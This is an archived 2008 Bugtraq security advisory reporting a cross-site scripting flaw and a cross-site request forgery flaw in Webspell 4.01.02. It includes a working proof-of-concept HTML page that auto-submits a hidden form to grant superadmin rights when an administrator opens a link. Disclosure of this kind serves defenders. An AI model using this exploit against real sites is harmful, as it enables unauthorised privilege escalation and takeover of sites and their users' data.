lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 30 Jan 2008 14:12:58 +0100 From: nbbn@....net To: bugtraq@...urityfocus.com Subject: Webspell 4.01.02 2 Vulnerabilites ######################################################################################## Webspell 4.01.02 2 Vulnerabilites Founded by NBBN Vendor: http://cms.webspell.org ######################################################################################## 1) Cross-Site Scripting Vulnerability 2) Change User Permission XSRF Vulnerability 1) http://site.tld/path/index.php?site=whoisonline&sort=">[xss code] 2) This creates a superadmin account, when an admin click a link, to a site with the following code: <html> <head> <title>Superadmin Creator</title> </head> <body onLoad=javascript:document.formular.submit()> <form name="formular" action="http://site.tld/webspell/admin/admincenter.php?site=members" method="POST"> <input type="hidden" name="superadmin" value="1"> <input type="hidden" name="id" value="3"> <!-- userid --> <input type="hidden" name="saveedit" value="update+member"> </form> </body> </html>
Powered by blists - more mailing lists